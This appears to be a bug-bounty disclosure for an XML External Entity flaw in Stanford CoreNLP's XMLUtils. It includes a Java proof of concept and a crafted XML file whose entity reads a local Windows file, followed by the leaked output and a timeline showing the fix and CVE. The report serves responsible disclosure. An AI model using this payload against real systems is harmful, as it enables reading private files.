Improper Restriction of XML External Entity Reference in stanfordnlp/corenlp

Valid

Reported on

Sep 29th 2021


✍️ Description

The Stanford CoreNLP package provides a set of natural language analysis tools written in Java, is using a vulnerable XML External Entity (XXE). An attacker that is able to provide a crafted XML file as input to the getTextContentFromTagsFromFile() function in the "XMLUtils.java" file may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server.

🕵️‍♂️ Proof of Concept

package xxe_poc;
import java.io.File;
import java.util.List;
import edu.stanford.nlp.util.XMLUtils; 

public class Poc {

    public static void main(String[] args) {
        File file = new File("C:\\Users\\[user]\\eclipse-workspace\\xxe_poc\\src\\main\\resources\\sample.xml");
        List<String> returnLlist = XMLUtils.getTextContentFromTagsFromFile(file, "lastName");
        System.out.print(returnLlist);

    }
}

sample.xml

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///c:/windows/win.ini"> ]>
<userInfo>
 <firstName>John</firstName>
 <lastName>&ent;</lastName>
</userInfo>

Check the Output:

[; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
]
We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
Srikanth Prathi
2 months ago

Researcher


@maintainer Please find the patch at https://github.com/srikanthprathi/CoreNLP/pulls

Srikanth Prathi modified their report
2 months ago
Srikanth Prathi modified their report
2 months ago
2 months ago
We have contacted a member of the stanfordnlp/corenlp team and are waiting to hear back 2 months ago
stanfordnlp/corenlp maintainer validated this vulnerability 2 months ago
Srikanth Prathi has been awarded the disclosure bounty
The fix bounty is now up for grabs
stanfordnlp/corenlp maintainer confirmed that a fix has been merged on 5d83f1 2 months ago
Srikanth Prathi has been awarded the fix bounty
Jamie Slome
2 months ago

Admin


CVE published! 🎊

Srikanth Prathi
2 months ago

Researcher


Thanks for the confirmation :-)